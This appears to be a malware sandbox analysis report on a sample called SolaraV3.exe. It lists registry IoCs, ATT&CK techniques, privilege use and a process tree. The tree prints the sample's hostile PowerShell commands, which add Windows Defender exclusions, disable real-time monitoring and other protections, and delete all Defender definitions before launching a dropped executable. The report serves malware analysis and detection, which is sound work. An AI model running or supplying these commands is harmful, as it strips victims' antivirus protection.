Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedgewebview2.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdgeUpdate.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A0B482A5-71D4-4395-857C-1F3B57FB8809}\InProcServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\ = "IProcessLauncher2"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\ = "IPolicyStatus4"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\msedgeupdate.dll,-3000"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4F4A7E-977C-4E23-AD8F-626A491715DF}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C06EE550-7248-488E-971E-B60C0AB3A6E4}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\NumMethods\ = "4"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{79E0C401-B7BC-4DE5-8104-71350F3A9B67}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ = "IJobObserver"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\LocalServer32\ = "\"C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\MicrosoftEdgeUpdateOnDemand.exe\""	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3E102DC6-1EDB-46A1-8488-61F71B35ED5F}\ = "IRegistrationUpdateHook"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\NumMethods\ = "26"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6DFFE7FE-3153-4AF1-95D8-F8FCCA97E56B}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\Elevation\IconReference = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\msedgeupdate.dll,-1004"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A5135E58-384F-4244-9A5F-30FA9259413C}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C853632E-36CA-4999-B992-EC0D408CF5AB}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.CoreMachineClass\ = "Microsoft Edge Update Core Class"	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{AB4EE1FC-0A81-4F56-B0E2-248FB78051AF}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.195.43\\psmachine_64.dll"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}\ServiceParameters = "/comsvc"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6B716CB-028B-404D-B72C-50E153DD68DA}\ProgID\ = "MicrosoftEdgeUpdate.OnDemandCOMClassSvc.1.0"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ = "ICoCreateAsync"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\ = "Microsoft Edge Update Broker Class Factory"	MicrosoftEdgeUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ = "IAppVersionWeb"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2EC826CB-5478-4533-9015-7580B3B5E03A}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F7B3738C-9BCA-4B14-90B7-89D0F3A3E497}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ = "IJobObserver"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\NumMethods\ = "7"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9A6B447A-35E2-4F6B-A87B-5DEEBBFDAD17}\NumMethods\ = "10"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}\VERSIONINDEPENDENTPROGID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{CECDDD22-2E72-4832-9606-A9B0E5E344B2}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E55B90F1-DA33-400B-B09E-3AFF7D46BD83}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A6556DFF-AB15-4DC3-A890-AB54120BEAEC}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C20433B3-0D4B-49F6-9B6C-6EE0FAE07837}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{A0B482A5-71D4-4395-857C-1F3B57FB8809}"	MicrosoftEdgeUpdateComRegisterShell64.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
432	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2936	powershell.exe
3708	powershell.exe
3708	powershell.exe
452	powershell.exe
2936	powershell.exe
2936	powershell.exe
452	powershell.exe
452	powershell.exe
3504	powershell.exe
3504	powershell.exe
3504	powershell.exe
4608	powershell.exe
4608	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
4608	powershell.exe
4328	powershell.exe
4328	powershell.exe
3592	powershell.exe
3592	powershell.exe
964	powershell.exe
964	powershell.exe
2412	powershell.exe
2412	powershell.exe
3596	powershell.exe
3596	powershell.exe
836	powershell.exe
836	powershell.exe
1572	MicrosoftEdgeUpdate.exe
1572	MicrosoftEdgeUpdate.exe
1572	MicrosoftEdgeUpdate.exe
1572	MicrosoftEdgeUpdate.exe
1572	MicrosoftEdgeUpdate.exe
1572	MicrosoftEdgeUpdate.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe
2380	Solara.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs

pid	Process
4836	msedgewebview2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	3708	powershell.exe
Token: SeDebugPrivilege	452	powershell.exe
Token: SeIncreaseQuotaPrivilege	4896	WMIC.exe
Token: SeSecurityPrivilege	4896	WMIC.exe
Token: SeTakeOwnershipPrivilege	4896	WMIC.exe
Token: SeLoadDriverPrivilege	4896	WMIC.exe
Token: SeSystemProfilePrivilege	4896	WMIC.exe
Token: SeSystemtimePrivilege	4896	WMIC.exe
Token: SeProfSingleProcessPrivilege	4896	WMIC.exe
Token: SeIncBasePriorityPrivilege	4896	WMIC.exe
Token: SeCreatePagefilePrivilege	4896	WMIC.exe
Token: SeBackupPrivilege	4896	WMIC.exe
Token: SeRestorePrivilege	4896	WMIC.exe
Token: SeShutdownPrivilege	4896	WMIC.exe
Token: SeDebugPrivilege	4896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4896	WMIC.exe
Token: SeRemoteShutdownPrivilege	4896	WMIC.exe
Token: SeUndockPrivilege	4896	WMIC.exe
Token: SeManageVolumePrivilege	4896	WMIC.exe
Token: 33	4896	WMIC.exe
Token: 34	4896	WMIC.exe
Token: 35	4896	WMIC.exe
Token: 36	4896	WMIC.exe
Token: SeDebugPrivilege	4108	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4896	WMIC.exe
Token: SeSecurityPrivilege	4896	WMIC.exe
Token: SeTakeOwnershipPrivilege	4896	WMIC.exe
Token: SeLoadDriverPrivilege	4896	WMIC.exe
Token: SeSystemProfilePrivilege	4896	WMIC.exe
Token: SeSystemtimePrivilege	4896	WMIC.exe
Token: SeProfSingleProcessPrivilege	4896	WMIC.exe
Token: SeIncBasePriorityPrivilege	4896	WMIC.exe
Token: SeCreatePagefilePrivilege	4896	WMIC.exe
Token: SeBackupPrivilege	4896	WMIC.exe
Token: SeRestorePrivilege	4896	WMIC.exe
Token: SeShutdownPrivilege	4896	WMIC.exe
Token: SeDebugPrivilege	4896	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4896	WMIC.exe
Token: SeRemoteShutdownPrivilege	4896	WMIC.exe
Token: SeUndockPrivilege	4896	WMIC.exe
Token: SeManageVolumePrivilege	4896	WMIC.exe
Token: 33	4896	WMIC.exe
Token: 34	4896	WMIC.exe
Token: 35	4896	WMIC.exe
Token: 36	4896	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3060	WMIC.exe
Token: SeSecurityPrivilege	3060	WMIC.exe
Token: SeTakeOwnershipPrivilege	3060	WMIC.exe
Token: SeLoadDriverPrivilege	3060	WMIC.exe
Token: SeSystemProfilePrivilege	3060	WMIC.exe
Token: SeSystemtimePrivilege	3060	WMIC.exe
Token: SeProfSingleProcessPrivilege	3060	WMIC.exe
Token: SeIncBasePriorityPrivilege	3060	WMIC.exe
Token: SeCreatePagefilePrivilege	3060	WMIC.exe
Token: SeBackupPrivilege	3060	WMIC.exe
Token: SeRestorePrivilege	3060	WMIC.exe
Token: SeShutdownPrivilege	3060	WMIC.exe
Token: SeDebugPrivilege	3060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3060	WMIC.exe
Token: SeRemoteShutdownPrivilege	3060	WMIC.exe
Token: SeUndockPrivilege	3060	WMIC.exe
Token: SeManageVolumePrivilege	3060	WMIC.exe
Token: 33	3060	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2380	Solara.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4584 wrote to memory of 3616	4584	SolaraV3.exe	83
PID 4584 wrote to memory of 3616	4584	SolaraV3.exe	83
PID 3616 wrote to memory of 1072	3616	SolaraV3.exe	84
PID 3616 wrote to memory of 1072	3616	SolaraV3.exe	84
PID 3616 wrote to memory of 1160	3616	SolaraV3.exe	85
PID 3616 wrote to memory of 1160	3616	SolaraV3.exe	85
PID 3616 wrote to memory of 4668	3616	SolaraV3.exe	88
PID 3616 wrote to memory of 4668	3616	SolaraV3.exe	88
PID 3616 wrote to memory of 5096	3616	SolaraV3.exe	89
PID 3616 wrote to memory of 5096	3616	SolaraV3.exe	89
PID 3616 wrote to memory of 2836	3616	SolaraV3.exe	90
PID 3616 wrote to memory of 2836	3616	SolaraV3.exe	90
PID 3616 wrote to memory of 1500	3616	SolaraV3.exe	91
PID 3616 wrote to memory of 1500	3616	SolaraV3.exe	91
PID 3616 wrote to memory of 3852	3616	SolaraV3.exe	96
PID 3616 wrote to memory of 3852	3616	SolaraV3.exe	96
PID 1072 wrote to memory of 2936	1072	cmd.exe	98
PID 1072 wrote to memory of 2936	1072	cmd.exe	98
PID 1160 wrote to memory of 3708	1160	cmd.exe	99
PID 1160 wrote to memory of 3708	1160	cmd.exe	99
PID 4668 wrote to memory of 452	4668	cmd.exe	100
PID 4668 wrote to memory of 452	4668	cmd.exe	100
PID 2836 wrote to memory of 3188	2836	cmd.exe	101
PID 2836 wrote to memory of 3188	2836	cmd.exe	101
PID 1500 wrote to memory of 4108	1500	cmd.exe	102
PID 1500 wrote to memory of 4108	1500	cmd.exe	102
PID 3852 wrote to memory of 4896	3852	cmd.exe	103
PID 3852 wrote to memory of 4896	3852	cmd.exe	103
PID 5096 wrote to memory of 2452	5096	cmd.exe	104
PID 5096 wrote to memory of 2452	5096	cmd.exe	104
PID 3616 wrote to memory of 4784	3616	SolaraV3.exe	106
PID 3616 wrote to memory of 4784	3616	SolaraV3.exe	106
PID 4784 wrote to memory of 1576	4784	cmd.exe	146
PID 4784 wrote to memory of 1576	4784	cmd.exe	146
PID 3616 wrote to memory of 3940	3616	SolaraV3.exe	109
PID 3616 wrote to memory of 3940	3616	SolaraV3.exe	109
PID 3940 wrote to memory of 3596	3940	cmd.exe	111
PID 3940 wrote to memory of 3596	3940	cmd.exe	111
PID 3616 wrote to memory of 1228	3616	SolaraV3.exe	112
PID 3616 wrote to memory of 1228	3616	SolaraV3.exe	112
PID 1228 wrote to memory of 3060	1228	cmd.exe	114
PID 1228 wrote to memory of 3060	1228	cmd.exe	114
PID 3616 wrote to memory of 4960	3616	SolaraV3.exe	115
PID 3616 wrote to memory of 4960	3616	SolaraV3.exe	115
PID 4960 wrote to memory of 5048	4960	cmd.exe	117
PID 4960 wrote to memory of 5048	4960	cmd.exe	117
PID 3616 wrote to memory of 4328	3616	SolaraV3.exe	184
PID 3616 wrote to memory of 4328	3616	SolaraV3.exe	184
PID 3616 wrote to memory of 3936	3616	SolaraV3.exe	119
PID 3616 wrote to memory of 3936	3616	SolaraV3.exe	119
PID 4328 wrote to memory of 3160	4328	cmd.exe	122
PID 4328 wrote to memory of 3160	4328	cmd.exe	122
PID 3616 wrote to memory of 4864	3616	SolaraV3.exe	123
PID 3616 wrote to memory of 4864	3616	SolaraV3.exe	123
PID 3616 wrote to memory of 508	3616	SolaraV3.exe	124
PID 3616 wrote to memory of 508	3616	SolaraV3.exe	124
PID 3936 wrote to memory of 3504	3936	cmd.exe	126
PID 3936 wrote to memory of 3504	3936	cmd.exe	126
PID 3616 wrote to memory of 3200	3616	SolaraV3.exe	128
PID 3616 wrote to memory of 3200	3616	SolaraV3.exe	128
PID 508 wrote to memory of 1824	508	cmd.exe	200
PID 508 wrote to memory of 1824	508	cmd.exe	200
PID 4864 wrote to memory of 2868	4864	cmd.exe	130
PID 4864 wrote to memory of 2868	4864	cmd.exe	130

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection	msedgewebview2.exe

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4992	attrib.exe
4668	attrib.exe
3160	attrib.exe

cURL User-Agent 8 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	110	curl/8.9.1-DEV
HTTP User-Agent header	93	curl/8.9.1-DEV
HTTP User-Agent header	97	curl/8.9.1-DEV
HTTP User-Agent header	98	curl/8.9.1-DEV
HTTP User-Agent header	99	curl/8.9.1-DEV
HTTP User-Agent header	100	curl/8.9.1-DEV
HTTP User-Agent header	102	curl/8.9.1-DEV
HTTP User-Agent header	109	curl/8.9.1-DEV

C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraV3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3708
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5096
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3596
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Solara'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:836
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3592
    - - C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe" /silent /install
        5⤵
        Executes dropped EXE
